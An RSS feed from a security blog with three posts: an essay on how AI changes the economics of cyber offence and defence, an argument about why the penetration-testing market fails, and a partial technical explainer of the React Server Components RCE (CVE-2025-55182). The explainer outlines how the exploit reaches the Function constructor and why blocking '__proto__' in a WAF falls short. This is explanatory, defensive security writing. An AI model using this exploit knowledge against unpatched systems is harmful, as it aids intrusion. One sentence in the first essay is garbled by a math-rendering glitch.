<?xml version="1.0" encoding="utf-8"?>
<rss version="2.0" xmlns:dc="http://purl.org/dc/elements/1.1/" xmlns:content="http://purl.org/rss/1.0/modules/content/">
    <channel>
        <title>Zeyu (Zayne) Zhang</title>
        <link>https://www.analogue.computer</link>
        <description>Where I write about software engineering, computer security, and everything in between.</description>
        <lastBuildDate>Thu, 16 Apr 2026 17:40:07 GMT</lastBuildDate>
        <docs>https://validator.w3.org/feed/docs/rss2.html</docs>
        <generator>https://github.com/jpmonette/feed</generator>
        <image>
            <title>Zeyu (Zayne) Zhang</title>
            <url>https://www.analogue.computer/favicon.ico</url>
            <link>https://www.analogue.computer</link>
        </image>
        <copyright>All rights reserved 2026</copyright>
        <item>
            <title><![CDATA[Cyber 2028]]></title>
            <link>https://www.analogue.computer/blog/cyber-2028</link>
            <guid>https://www.analogue.computer/blog/cyber-2028</guid>
            <pubDate>Sat, 11 Apr 2026 00:00:00 GMT</pubDate>
            <content:encoded><![CDATA[<p>Anthropic published its <a href="https://red.anthropic.com/2026/mythos-preview/">Mythos Preview cybersecurity evaluation</a> a few days ago, and a lot of people in cyber are spooked.</p>
<p>Not because it reads like a scenario piece such as <a href="https://ai-2027.com/">AI 2027</a>, but because the point is more immediate: if frontier models are already finding and exploiting serious zero-days across major software targets, cyber is changing right now.</p>
<p>This is a prediction essay about what happens now.</p>
<p>My basic claim is that as cyber moves from a labor-bound craft industry to a capital-bound one, the economics of offense, defense, and state power change with it.</p>
<h2>Cyber was a craft industry</h2>
<p>The parts of cyber that people usually mean when they say "advanced" have historically looked much closer to guild craftsmanship than industrial production. Good operators built intuition over years. They learned how to read weird codebases, infer system behavior from partial telemetry, chain small observations into a coherent exploit path, and adapt when the target did something unexpected.</p>
<p>That kind of work did not scale. If you want twice as much output, you usually need roughly twice as many good people, and those people are hard to find, expensive to retain, and slow to train.</p>
<p>This labor bottleneck has protected the world more than most people realize.</p>
<p>A lot of current defensive assumptions only work because attackers have historically faced scarcity too. They could not deeply understand every target. They could not afford endless iteration against every exposed service. They could not customize every social engineering pretext. They could not continuously mutate malware or intrusion paths at machine speed while keeping quality high.</p>
<p>In other words, many systems are not secure in the strong sense. They are secure only because the attacker cannot afford to care enough.</p>
<p>Now, at the frontier, cyber power starts to concentrate among states and a small number of well-capitalized firms that can afford the full stack. At the same time, the marginal cost of many offensive actions collapses, which means the rest of the world gets flooded with cheap offensive capability. The frontier centralizes while the edge democratizes.</p>
<p>That is the story of Cyber 2028.</p>
<h2>The bottleneck moves up the stack</h2>
<p>Human expertise does not necessarily disappear, but more of it gets externalized into software and wrapped in systems that can be run <strong>repeatedly</strong>.</p>
<p>The useful unit is no longer just "a really smart hacker". It is something closer to an offensive production stack that can be parallelized:</p>
<ul>
<li>large models trained on code, infrastructure, and operational traces</li>
<li>agent loops that can do recon, hypothesis generation, tool use, validation, and adaptation</li>
<li>high-quality telemetry and vulnerability datasets</li>
<li>large-scale sandboxing and replay environments</li>
<li>delivery infrastructure, persistence infrastructure, and orchestration infrastructure</li>
</ul>
<p>None of this makes offense free. Frontier capability may become more expensive, not less. But it changes <em>where</em> the expense is. Instead of paying mainly for labor, you increasingly pay for the systems that make labor far more productive.</p>
<p>The "AI makes everyone a 10x hacker" framing is too shallow. The more important effect is that AI lets a small number of highly capable people scale their judgement far more efficiently than a large number of average people. It is easier to give one top hacker or engineer <span class="katex"><span class="katex-mathml"><math xmlns="http://www.w3.org/1998/Math/MathML"><semantics><mrow><mn>100</mn><mi>k</mi><mi>t</mi><mi>o</mi><mi>k</mi><mi>e</mi><mi>n</mi><mi>s</mi><mi>a</mi><mi>n</mi><mi>d</mi><mi>e</mi><mi>x</mi><mi>c</mi><mi>e</mi><mi>l</mi><mi>l</mi><mi>e</mi><mi>n</mi><mi>t</mi><mi>t</mi><mi>o</mi><mi>o</mi><mi>l</mi><mi>i</mi><mi>n</mi><mi>g</mi><mi>t</mi><mi>h</mi><mi>a</mi><mi>n</mi><mi>t</mi><mi>o</mi><mi>h</mi><mi>i</mi><mi>r</mi><mi>e</mi><mn>100</mn><mi>m</mi><mi>o</mi><mi>r</mi><mi>e</mi><mi>p</mi><mi>e</mi><mi>o</mi><mi>p</mi><mi>l</mi><mi>e</mi><mi>a</mi><mi>n</mi><mi>d</mi><mi>g</mi><mi>i</mi><mi>v</mi><mi>e</mi><mi>e</mi><mi>a</mi><mi>c</mi><mi>h</mi><mi>o</mi><mi>f</mi><mi>t</mi><mi>h</mi><mi>e</mi><mi>m</mi></mrow><annotation encoding="application/x-tex">100k tokens and excellent tooling than to hire 100 more people and give each of them </annotation></semantics></math></span><span class="katex-html" aria-hidden="true"><span class="base"><span class="strut" style="height:0.8889em;vertical-align:-0.1944em"></span><span class="mord">100</span><span class="mord mathnormal" style="margin-right:0.03148em">k</span><span class="mord mathnormal">t</span><span class="mord mathnormal">o</span><span class="mord mathnormal" style="margin-right:0.03148em">k</span><span class="mord mathnormal">e</span><span class="mord mathnormal">n</span><span class="mord mathnormal">s</span><span class="mord mathnormal">an</span><span class="mord mathnormal">d</span><span class="mord mathnormal">e</span><span class="mord mathnormal">x</span><span class="mord mathnormal">ce</span><span class="mord mathnormal" style="margin-right:0.01968em">ll</span><span class="mord mathnormal">e</span><span class="mord mathnormal">n</span><span class="mord mathnormal">tt</span><span class="mord mathnormal">oo</span><span class="mord mathnormal" style="margin-right:0.01968em">l</span><span class="mord mathnormal">in</span><span class="mord mathnormal" style="margin-right:0.03588em">g</span><span class="mord mathnormal">t</span><span class="mord mathnormal">han</span><span class="mord mathnormal">t</span><span class="mord mathnormal">o</span><span class="mord mathnormal">hi</span><span class="mord mathnormal">re</span><span class="mord">100</span><span class="mord mathnormal">m</span><span class="mord mathnormal">ore</span><span class="mord mathnormal">p</span><span class="mord mathnormal">eo</span><span class="mord mathnormal" style="margin-right:0.01968em">pl</span><span class="mord mathnormal">e</span><span class="mord mathnormal">an</span><span class="mord mathnormal">d</span><span class="mord mathnormal" style="margin-right:0.03588em">g</span><span class="mord mathnormal">i</span><span class="mord mathnormal" style="margin-right:0.03588em">v</span><span class="mord mathnormal">ee</span><span class="mord mathnormal">a</span><span class="mord mathnormal">c</span><span class="mord mathnormal">h</span><span class="mord mathnormal">o</span><span class="mord mathnormal" style="margin-right:0.10764em">f</span><span class="mord mathnormal">t</span><span class="mord mathnormal">h</span><span class="mord mathnormal">e</span><span class="mord mathnormal">m</span></span></span></span>1k tokens. Offensive throughput starts to scale more like cloud spend than like headcount.</p>
<p>That matters because capital compounds differently from labor.</p>
<p>Actors with deep pockets can buy more parallelism, more data, more evals, more validation, and faster feedback loops. They can run thousands of exploit hypotheses where a normal team would run ten. They can test persistence mechanisms, phishing variants, privilege-escalation chains, and lateral movement plans continuously instead of occasionally. They can close the loop between failed operations and improved models much faster than anyone else.</p>
<p>So the decisive question becomes less "who has the best hackers?" and more "who can best industrialize them?"</p>
<h2>Why this does not just centralize everything</h2>
<p>At first glance, this sounds like a pure concentration story. Rich states and hyperscalers win. Everyone else loses. There is some truth to that. But it misses the more dangerous half of the picture.</p>
<p><strong>The fixed costs of frontier capability rise. The marginal cost of many attacks falls.</strong></p>
<p>The top end of cyber becomes more capital-intensive because the frontier stack is expensive. But once the stack exists, the cost of generating one more phishing lure, one more impersonation attempt, one more malware variant, one more target dossier, one more exploit hypothesis, or one more intrusion path can become extremely low.</p>
<p>A world where ten actors are terrifying is manageable. A world where ten million actors can each generate plausible offensive pressure cheaply is not.</p>
<p>So the paradox is this:</p>
<ul>
<li>strategic cyber concentrates</li>
<li>tactical cyber proliferates</li>
</ul>
<p>Major states and a few top-capitalized actors may dominate the frontier. But criminals, mercenaries, fraud shops, low-tier APTs, and ordinary nuisance actors all get dragged upward by the falling marginal cost of competence.</p>
<p>So Cyber 2028 is not a story about centralization or democratization. It is both at once.</p>
<h2>Strategic cyber starts to look different</h2>
<p>So does this mean cyber weapons become more like nuclear weapons? Probably not quite. Cyber remains noisier, leakier, harder to attribute, easier to reuse, and far more useful below the threshold of open conflict. Nuclear weapons are mostly valuable because they are not used. Cyber capability is often valuable precisely because it is used continuously, as long as it is not detected or below the threshold of starting a war.</p>
<p>Still, at the frontier, cyber does begin to acquire some strategic-weapons-like features.</p>
<p>First, top-end capability becomes concentrated among a relatively small number of actors who can afford the full stack.</p>
<p>Second, many capabilities will be held in reserve rather than burned immediately, such as zero-days and backdoors that provide latent access into critical infrastructure, logistics systems, telecoms, satellite links, industrial control environments, or key software supply chains.</p>
<p>Third, deterrence becomes even murkier because states can signal capability without disclosing specifics, while the real value sits in uncertainty: what access has already been established, what can be turned on in a crisis, and what dependencies are already compromised.</p>
<p>The result is not really a one-to-one replacement for nuclear deterrence. It is something stranger: continuous pre-battlefield shaping under partial visibility.</p>
<p>As frontier cyber becomes more nuclear-like, mutually assured destruction means that smaller players like rogue actors and criminals become the day-to-day threat.</p>
<p>By 2028, I expect the line between "crime", "espionage", "influence", and "preparation of the battlefield" to blur further. The same access pathway can support all four depending on when it is used and by whom.</p>
<h3>1. The mid-market company that can no longer hide</h3>
<p>A mid-sized SaaS company in 2020 could survive partly by being uninteresting. It might not have world-class security, but it also was not worth an advanced attacker burning much time on. The long tail of mediocre defenses benefited from attacker scarcity.</p>
<p>By 2028, that shelter collapses.</p>
<p>The company is now probed constantly by agentic offensive systems that can read public documentation, infer likely cloud architecture from job listings and stack traces, adapt phishing lures to individual employees, and continuously generate new intrusion hypotheses. Nobody on the attacker side needs to think this company is special. The cost of caring has collapsed.</p>
<p>So the security posture of the median firm starts to depend less on whether it is important, and more on whether it can automate defense faster than cheap attackers can automate offense. A lot of firms discover, too late, that "not being a target" was never a strategy. It was a subsidy.</p>
<h3>2. The criminal group with industrial-scale personalization</h3>
<p>Today, the average scam or intrusion campaign is still constrained by quality. Personalization exists, but it is often shallow. Operators make tradeoffs between scale and credibility.</p>
<p>By 2028, the better criminal groups may not have to choose as often.</p>
<p>A relatively small organization will be able to run campaigns with dossiers built from breached data, public social graphs, leaked inboxes, corporate org charts, conference talks, internal writing style, and prior communication patterns. Pretexts will be generated, tested, and adapted automatically. Voice and video impersonation will not be perfect, but they will not need to be. Most fraud does not require perfection. It requires one tired employee at the wrong moment.</p>
<p>This does not mean every gang becomes elite. It means elite tradecraft fragments into reusable infrastructure. Once enough of the offensive stack gets productized, the median criminal operator gets much better without understanding much more.</p>
<h3>3. The state that never quite attacks</h3>
<p>Now zoom out to major-power competition.</p>
<p>A capable state in 2028 may spend years building, validating, and quietly maintaining access into shipping, energy, telecoms, cloud control planes, and defense-adjacent supply chains, not because it intends to trigger immediate disruption, but because optionality itself becomes strategic.</p>
<p>That access sits there in peacetime, half-espionage and half-contingency plan.</p>
<p>Cyber at the frontier means that capable nation states have pre-positioned leverage inside the systems that other nation states depend on. If a war breaks out, this leverage allows them to impose devastation on multiple enemy states in milliseconds and without firing a shot. So no war happens, only because starting one would mean the enemy has already won.</p>
<h2>The defense side also becomes capital-bound</h2>
<p>There is an obvious response to all this: fine, defense gets cheaper too.</p>
<p>Defenders will definitely get better tooling, better anomaly detection, better code review, faster triage, stronger identity enforcement, automated remediation, and much richer feedback loops between incidents and prevention. The best organizations will look dramatically more resilient than they do today.</p>
<p>But this is precisely the problem. Resilience starts to look like a scale advantage.</p>
<p>Organizations with enough money, talent density, and telemetry can build defensible environments. Everyone else gets the worse version of this future.</p>
<p>The frontier firms and the strongest states may become more defensible than ever. The median school, hospital, logistics provider, local government, vendor, or SMB may become relatively less defensible, not because defenders there are stupid, but because they cannot afford the fixed costs of industrialized defense.</p>
<p>That has policy consequences because modern societies are only as strong as their softest critical dependencies.</p>
<h2>What follows from this?</h2>
<p>If this model is even directionally right, then a lot of current cyber policy is aimed at the wrong level of abstraction.</p>
<p>The problem is not simply "more cyber attacks". The problem is a structural shift in the economics of capability. Policy that assumes cyber remains bottlenecked mainly by elite labor will age badly.</p>
<p>Some implications seem straightforward.</p>
<p>First, we should expect security capacity to become more uneven, and plan around that explicitly. It is not enough to harden the top 1% of organizations if the supply chain, local government, healthcare, and industrial base remain easy to pressure.</p>
<p>Second, resilience matters more than perfect prevention. In a world of abundant low-cost offense, the decisive defensive advantage is often the ability to recover quickly, revoke trust quickly, rotate secrets quickly, and continue operating under partial compromise.</p>
<p>Finally, governments should be careful not to overlearn the concentration half of the story. Yes, frontier cyber may centralize among major powers. But the broader social harm may come less from exquisite state capability than from the background radiation of cheap offense everywhere else.</p>
<p>That means public policy cannot focus only on the most advanced adversaries. It also has to reduce the everyday attackability of ordinary institutions.</p>
<h2>The new cyber order</h2>
<p>The point is simple:</p>
<p>Cyber stops being a craft industry and becomes an industrial one.</p>
<p>That does not make it less human. It changes where human expertise sits in the stack. Elite labor gets embedded in capital. A small number of strong actors build offensive and defensive systems that compound. Everyone else deals with the outputs.</p>
<p>This produces a bifurcated world.</p>
<p>At the top, cyber power becomes more strategic, more concentrated, and more entangled with state competition.</p>
<p>Everywhere else, offensive capability becomes cheaper, more personalized, more persistent, and much harder to ignore.</p>
<p>Cyber 2028 is not just "more hacks". It is a shift in the economics of capability.</p>
<p>The world does not run out of smart defenders. It runs out of organizations that can afford the capital stack required to let those defenders keep up.</p>]]></content:encoded>
            <author>ping@analogue.computer (Zeyu (Zayne) Zhang)</author>
        </item>
        <item>
            <title><![CDATA[The economic failures of penetration testing]]></title>
            <link>https://www.analogue.computer/blog/security-economics</link>
            <guid>https://www.analogue.computer/blog/security-economics</guid>
            <pubDate>Fri, 09 Jan 2026 00:00:00 GMT</pubDate>
            <content:encoded><![CDATA[<p>Offensive security seems to be getting its time in the sun again with the rise of AI-powered tools that promise
fully autonomous penetration testing. But is it really all that different from the old days?</p>
<p>The persistent failure of the penetration testing market is often framed as a technical problem:
not enough talent, insufficient automation, immature tooling, or attackers moving faster than defenders.
This framing is comforting because it implies that incremental technical progress will eventually close the gap.
In reality, the core problem is economic. It systematically rewards the appearance of security over the reduction of risk,
and it does so through a predictable set of incentive failures that any A-Level Economics student can explain.</p>
<p>The core problem: it is not a market for outcomes, it is a market for signals.</p>
<h2>Information Asymmetry and Adverse Selection</h2>
<p>Akerlof's <a href="https://en.wikipedia.org/wiki/Market_for_lemons">market for lemons</a> is a classic example of how information asymmetry can
lead to market failure. In the used car market, the seller knows more about the quality of the car than the buyer. It is impossible
for the buyer to know the true quality of the car before buying it, so they price for the expected (average) quality.
This leads to the high-quality sellers leaving the market because the average price falls below their cost of production,
leading the average quality of the market to fall further.</p>
<p>In a similar vein, the penetration testing market adversely selects against the best pentesters, instead selecting for proxy
signals: certifications, report length, vulnerability counts, or compliance acceptance.
None of these are tightly correlated with real attacker cost or the likelihood of a breach.
Again, there are tons of firms with CREST certifications, so the buyer prices for the average.
High-quality providers, whose work is slower, more expensive, and harder to explain in a procurement meeting, are crowded out.
Lower-quality providers, who can produce predictable findings cheaply and repeatedly, start to dominate the market.</p>
<p>Over time, this drives a race to the bottom. The equilibrium product becomes the "acceptable" pentest:
one that produces familiar, low-hanging fruit, fits procurement expectations, and minimizes organizational disruption,
regardless of whether it meaningfully models attacker sophistication.</p>
<h2>Moral Hazards and Perverse Feedback Loops</h2>
<p>Moral hazards occur when one party to a transaction has an incentive to take actions that are not in the best interest of the other party.
In the pentesting market, the pentesting firm has an incentive to find issues, not to actually reduce risk.
There is no upside for identifying deep systemic flaws that are politically difficult or expensive to fix.</p>
<p>Security teams, meanwhile, are often evaluated on audit success rather than security posture. Their rational incentive is to
commission work that passes compliance checks with minimal internal friction. A pentest that uncovers uncomfortable architectural
weaknesses creates political cost without guaranteeing budget or remediation authority.
A shallow pentest that confirms existing narratives is safer.</p>
<p>This moral hazard produces predictable behavior. Pentests focus on low-hanging fruit.
Reports emphasize volume over depth. The same vulnerability classes reappear annually, not because they are hard to fix,
but because no one is economically rewarded for ensuring that they are fixed.</p>
<p>Modern application-security tooling exacerbates the problem. Better tools increase visibility into real risk,
but visibility generates work. Findings require triage, prioritization, fixes, regressions, and cross-team coordination.
For engineering organizations already under delivery pressure, security improvements often appear as a pure tax.</p>
<p>From a narrow organizational perspective, it is rational to underinvest in tools or tests that surface actionable
truth without providing remediation capacity. A weak pentest that produces a small, predictable list of issues is
less disruptive than a strong system that reveals hundreds of real weaknesses. In this sense, insecurity becomes
a form of organizational equilibrium. Unless the tool makes <strong>remediation</strong> low-friction, it will not be easily adopted.</p>
<h2>The Compliance Demand proxy</h2>
<p>Compliance frameworks like SOC 2 and ISO 27001 further distort incentives by acting as demand proxies for security.
Pentests are purchased not to actually find meaningful security issues, but because they are required by an external checklist.
This moves the goalpost away from realistic attacker behaviour and towards helping the organisation pass the audit.</p>
<p>Fixed-scope, time-boxed engagements are imposed regardless of system complexity or change velocity.
Success is defined by the presence of a report, not by the absence of exploitable paths.
In this environment, pentesting becomes performative: existing to satisfy third parties, not to inform internal decision-making.</p>
<p>This section of demand almost entirely selects for security theatre.</p>
<h2>Pricing Failures and the Race to the Bottom</h2>
<p>The dominant pricing models in pentesting — flat fees and hourly rates — are poorly aligned with outcomes.
They decouple compensation from exploit difficulty, business impact, or remediation success.
Competitive pressure pushes firms to reduce costs through junior staffing, templated methodologies, and superficial checklist-based testing.</p>
<p>Because quality remains largely unobservable, price becomes the primary axis of competition.
The market clears not at the price of risk reduction, but at the price of plausible deniability.</p>
<h2>Positive Externalities</h2>
<p>Markets with positive externalities tend to under-consume because the second-order effects on the ecosystem are not directly felt by the buyer,
so they are not priced in.</p>
<p>Security improvements generate positive externalities. A company that fixes systemic vulnerabilities reduces risk not only for itself, but for customers,
partners, and the broader ecosystem. However, the cost of remediation is borne immediately and internally, while much of the benefit is diffused over time and external.</p>
<p>This is why companies often deploy cheap fixes that don't remediate fundamental architectural weaknesses, and why the same bug fixed from
a previous pentest tends to resurface in another slightly different form later.</p>
<h2>Re-aligning Incentives</h2>
<p>The failures described above persist not because organizations misunderstand security, but because the current market
clears at an equilibrium optimized for compliance, cost containment, and plausible deniability.
Any attempt to "fix" the penetration-testing market must therefore focus on changing incentives rather than improving technical capabilities in isolation.</p>
<p>Looking ahead into the next 5 years, how do we improve the market? There is no perfect answer, but some things that come to mind:</p>
<ol>
<li>
<p><strong>Re-internalise external responsibilities</strong>: moving from one-off pentests that hands off all long-term responsibility to the buyer
to a continuous approach that expects long-term, consistent outcomes from the seller. Security products should be designed
to stand the test of time, and be viewed as a way to reduce responsibility for the security team.</p>
</li>
<li>
<p><strong>Align pricing with outcomes</strong>: selling actionable outcomes, which include <em>both</em> discovery and triaging/remediation,
reduces noise and prevents information that cannot be acted on from being marketed as value. Security tooling that creates more
work for engineering teams with no corresponding budget or authority is not sustainable. Tools should make remediation low-friction,
and organisations should view these tools as reducing work, not increasing it.</p>
</li>
<li>
<p><strong>Reframe compliance as a lagging indicator</strong>: rather than being a primary driver of demand,
compliance artifacts should be seen as byproducts of a secure system (instead of its objective!). This is a hard one
because it requires shifting of internal metrics.</p>
</li>
</ol>
<p>Attempts to improve security by increasing technical capability alone will fail. More accurate testing, better tools,
or deeper analysis raise the cost of information without changing who bears responsibility for acting on it.
The result is a market that systematically undervalues high-signal work and selects against those who produce it.</p>
<p>In this sense, the failures of the pentesting market are not unique. They mirror the broader economics of prevention:
costs are immediate, benefits are invisible, and success is defined by the absence of events that cannot be proven to have been avoided.
Markets built on such foundations require deliberate incentive design to function at all.</p>
<p>Absent that design, penetration testing will remain what it largely is today: not a mechanism for reducing risk,
but a ritual that allows organizations to proceed as if they had.</p>]]></content:encoded>
            <author>ping@analogue.computer (Zeyu (Zayne) Zhang)</author>
        </item>
        <item>
            <title><![CDATA[Making sense of React4Shell / React2Shell (CVE-2025-55182)]]></title>
            <link>https://www.analogue.computer/blog/react4shell</link>
            <guid>https://www.analogue.computer/blog/react4shell</guid>
            <pubDate>Sat, 06 Dec 2025 00:00:00 GMT</pubDate>
            <content:encoded><![CDATA[<p>It seems like security folks never catch a break in December. 3 days ago, a critical remote code execution vulnerability in the React Server Components Flight Protocol was discovered and patched.</p>
<p>This is still an ongoing story, but I'll try to break through the noise and share the technical details of the vulnerability, my thoughts on it, and how <a href="https://www.hacktron.ai">Hacktron</a> responded by participating actively in
the community effort to remediate the vulnerability.</p>
<h2>TL;DR</h2>
<ul>
<li><a href="https://react.dev/blog/2025/12/03/critical-security-vulnerability-in-react-server-components">CVE-2025-55182</a> is a critical unauthenticated RCE vulnerability in the React Server Components (RSC) "Flight" protocol.</li>
<li>Default configurations, such as a Next.js app created with <code>create-next-app@16.0.6</code> and built for production, are vulnerable with no code changes by the developer.</li>
<li>Exploitation requires only a single, unauthenticated HTTP request.</li>
<li>Public RCE exploits are available, and are being actively exploited in the wild.</li>
<li>Cloudflare, Vercel, and others have implemented WAF mitigations to block exploits. Vercel has introduced a <a href="https://hackerone.com/vercel_platform_protection">public bug bounty</a> for WAF bypasses.</li>
<li>Hacktron's research team has identified and reported 3 WAF bypasses to Vercel, and has been working closely with relevant security teams to mitigate the vulnerability.</li>
</ul>
<figure class="mx-auto"><img alt="PoC Exploit" loading="lazy" width="1711" height="715" decoding="async" data-nimg="1" style="color:transparent" srcset="/_next/image?url=%2F_next%2Fstatic%2Fmedia%2F0.5a712e5f.png&amp;w=1920&amp;q=75 1x, /_next/image?url=%2F_next%2Fstatic%2Fmedia%2F0.5a712e5f.png&amp;w=3840&amp;q=75 2x" src="/_next/image?url=%2F_next%2Fstatic%2Fmedia%2F0.5a712e5f.png&amp;w=3840&amp;q=75"><figcaption class="text-center">PoC Exploit</figcaption></figure>
<p><strong>Update:</strong> Some news sources have been calling this a prototype pollution vulnerability. This is incorrect. While public PoCs have used <code>__proto__</code>, this is only used to
get the <code>Function</code> constructor. The actual vulnerability is that we can access JavaScript properties like <code>constructor</code>, when these belong to the <code>Object</code> prototype and are not keys of the
the object itself.</p>
<p>It is true that the exploit relies on:</p>
<ol>
<li>accessing the <code>constructor</code> property of the <code>Object</code> prototype</li>
<li>overwriting a bunch of object properties</li>
</ol>
<p>But this is not "prototype pollution" as it is strictly defined in security. Prototype pollution means injecting malicious properties into the <em>global</em> <code>Object.prototype</code>, and being able to poison any JS object in the runtime. This would require accessing properties like <code>__proto__</code> or <code>prototype</code>.</p>
<p>Here, the minimum viable exploit does not require the <code>__proto__</code> or <code>prototype</code> property within the payload, so simply blacklisting these in a WAF will NOT work.</p>
<h2>Background</h2>
<p>To understand this vulnerability, we first need some context on React Server Components (RSC) and the Flight protocol.</p>
<h3>Server-Side Rendering and Server Components</h3>
<p>Prior to SSR, React applications used a fully client-side approach to rendering. The user would receive an HTML file that looked like this:</p>
<figure data-rehype-pretty-code-figure=""><pre style="background-color:#22272e;color:#adbac7" tabindex="0" data-language="html" data-theme="github-dark-dimmed"><code data-language="html" data-theme="github-dark-dimmed" style="display:grid"><span data-line=""><span style="color:#ADBAC7">&lt;!</span><span style="color:#8DDB8C">DOCTYPE</span><span style="color:#6CB6FF"> html</span><span style="color:#ADBAC7">&gt;</span></span>
<span data-line=""><span style="color:#ADBAC7">&lt;</span><span style="color:#8DDB8C">html</span><span style="color:#ADBAC7">&gt;</span></span>
<span data-line=""><span style="color:#ADBAC7">  &lt;</span><span style="color:#8DDB8C">body</span><span style="color:#ADBAC7">&gt;</span></span>
<span data-line=""><span style="color:#ADBAC7">    &lt;</span><span style="color:#8DDB8C">div</span><span style="color:#6CB6FF"> id</span><span style="color:#ADBAC7">=</span><span style="color:#96D0FF">"root"</span><span style="color:#ADBAC7">&gt;&lt;/</span><span style="color:#8DDB8C">div</span><span style="color:#ADBAC7">&gt;</span></span>
<span data-line=""><span style="color:#ADBAC7">    &lt;</span><span style="color:#8DDB8C">script</span><span style="color:#6CB6FF"> src</span><span style="color:#ADBAC7">=</span><span style="color:#96D0FF">"/static/js/bundle.js"</span><span style="color:#ADBAC7">&gt;&lt;/</span><span style="color:#8DDB8C">script</span><span style="color:#ADBAC7">&gt;</span></span>
<span data-line=""><span style="color:#ADBAC7">  &lt;/</span><span style="color:#8DDB8C">body</span><span style="color:#ADBAC7">&gt;</span></span>
<span data-line=""><span style="color:#ADBAC7">&lt;/</span><span style="color:#8DDB8C">html</span><span style="color:#ADBAC7">&gt;</span></span></code></pre></figure>
<p>That <code>bundle.js</code> script includes everything needed to mount and run the application. Once this script (which also includes React and other third-party dependencies) has been downloaded,
React can then render the entire application, placing it in the <code>&lt;div id="root"&gt;</code> element.</p>
<p>The problem is that this leads to a lot of latency for the user, as the entire application needs to be downloaded and parsed before it can be rendered.</p>
<p>To improve this experience, React introduced Server-Side Rendering (SSR), where the HTML is generated on the server and sent to the client.
Of course, we still need interactivity and event handlers, so we still include a <code>&lt;script&gt;</code> tag to "hydrate" the application.</p>
<p>Dan Abramov, one of React's core contributors, describes this process as follows:</p>
<blockquote>
<p>Hydration is like watering the “dry” HTML with the “water” of interactivity and event handlers.</p>
</blockquote>
<p>Nowadays, React components are split into two categories: Server Components and Client Components. By default, all components are Server Components, but we can mark a component as a Client Component by using the <code>use client</code> directive.</p>
<h3>The Flight Protocol</h3>
<p>In order to support executing function components on the server, and then building the DOM from the results, React needed a way to serialize
the React component tree into a format that can be sent to the client. This is where the Flight protocol comes in.</p>
<p>This is a very powerful and complete protocol that, for example, supports sending <code>Promise</code>s. This allows the client to render the rest of the application
as soon as it receives the initial HTML from the server, while waiting for some asynchronous operations such as database fetches to be completed.</p>
<p>For example, this React component:</p>
<figure data-rehype-pretty-code-figure=""><pre style="background-color:#22272e;color:#adbac7" tabindex="0" data-language="javascript" data-theme="github-dark-dimmed"><code data-language="javascript" data-theme="github-dark-dimmed" style="display:grid"><span data-line=""><span style="color:#F47067">export</span><span style="color:#F47067"> default</span><span style="color:#F47067"> function</span><span style="color:#DCBDFB"> Home</span><span style="color:#F69D50">() </span><span style="color:#ADBAC7">{</span></span>
<span data-line=""><span style="color:#F47067">  return</span><span style="color:#ADBAC7"> (</span></span>
<span data-line=""><span style="color:#ADBAC7">    &lt;</span><span style="color:#8DDB8C">main</span><span style="color:#ADBAC7">&gt;</span></span>
<span data-line=""><span style="color:#ADBAC7">      &lt;</span><span style="color:#8DDB8C">h1</span><span style="color:#ADBAC7">&gt;Hello world!&lt;/</span><span style="color:#8DDB8C">h1</span><span style="color:#ADBAC7">&gt;</span></span>
<span data-line=""><span style="color:#ADBAC7">    &lt;/</span><span style="color:#8DDB8C">main</span><span style="color:#ADBAC7">&gt;</span></span>
<span data-line=""><span style="color:#ADBAC7">  );</span></span>
<span data-line=""><span style="color:#ADBAC7">}</span></span></code></pre></figure>
<p>would be serialized to the following:</p>
<figure data-rehype-pretty-code-figure=""><pre style="background-color:#22272e;color:#adbac7" tabindex="0" data-language="javascript" data-theme="github-dark-dimmed"><code data-language="javascript" data-theme="github-dark-dimmed" style="display:grid"><span data-line=""><span style="color:#96D0FF">"[</span><span style="color:#F47067">\"</span><span style="color:#96D0FF">$</span><span style="color:#F47067">\"</span><span style="color:#96D0FF">,</span><span style="color:#F47067">\"</span><span style="color:#96D0FF">main</span><span style="color:#F47067">\"</span><span style="color:#96D0FF">,null,{</span><span style="color:#F47067">\"</span><span style="color:#96D0FF">children</span><span style="color:#F47067">\"</span><span style="color:#96D0FF">:[</span><span style="color:#F47067">\"</span><span style="color:#96D0FF">$</span><span style="color:#F47067">\"</span><span style="color:#96D0FF">,</span><span style="color:#F47067">\"</span><span style="color:#96D0FF">h1</span><span style="color:#F47067">\"</span><span style="color:#96D0FF">,null,{</span><span style="color:#F47067">\"</span><span style="color:#96D0FF">children</span><span style="color:#F47067">\"</span><span style="color:#96D0FF">:</span><span style="color:#F47067">\"</span><span style="color:#96D0FF">Hello world!</span><span style="color:#F47067">\"</span><span style="color:#96D0FF">},</span><span style="color:#F47067">\"</span><span style="color:#96D0FF">$c</span><span style="color:#F47067">\"</span><span style="color:#96D0FF">]},</span><span style="color:#F47067">\"</span><span style="color:#96D0FF">$c</span><span style="color:#F47067">\"</span><span style="color:#96D0FF">]"</span></span></code></pre></figure>
<p>This is what's contained in the <code>&lt;script&gt;</code> tag in the HTML response.</p>
<figure class="mx-auto"><img alt="HTML response" loading="lazy" width="1714" height="806" decoding="async" data-nimg="1" style="color:transparent" srcset="/_next/image?url=%2F_next%2Fstatic%2Fmedia%2F1.8e2b3f85.png&amp;w=1920&amp;q=75 1x, /_next/image?url=%2F_next%2Fstatic%2Fmedia%2F1.8e2b3f85.png&amp;w=3840&amp;q=75 2x" src="/_next/image?url=%2F_next%2Fstatic%2Fmedia%2F1.8e2b3f85.png&amp;w=3840&amp;q=75"><figcaption class="text-center"></figcaption></figure>
<h3>Server Functions</h3>
<p>In React 19, a new feature called "Server Functions" was introduced. This essentially allows RPC calls to be made from the client using the same
Flight machinery. For this, the <code>use server</code> directive was added to mark a function as a server function.</p>
<p>For instance, this form submission would call the <code>myServerAction</code> function on the server:</p>
<figure data-rehype-pretty-code-figure=""><pre style="background-color:#22272e;color:#adbac7" tabindex="0" data-language="javascript" data-theme="github-dark-dimmed"><code data-language="javascript" data-theme="github-dark-dimmed" style="display:grid"><span data-line=""><span style="color:#ADBAC7">&lt;</span><span style="color:#8DDB8C">form</span><span style="color:#6CB6FF"> action</span><span style="color:#F47067">={</span><span style="color:#ADBAC7">myServerAction</span><span style="color:#F47067">}</span><span style="color:#ADBAC7">&gt;</span></span>
<span data-line=""><span style="color:#ADBAC7">  &lt;</span><span style="color:#8DDB8C">input</span><span style="color:#6CB6FF"> name</span><span style="color:#F47067">=</span><span style="color:#96D0FF">"email"</span><span style="color:#ADBAC7"> /&gt;</span></span>
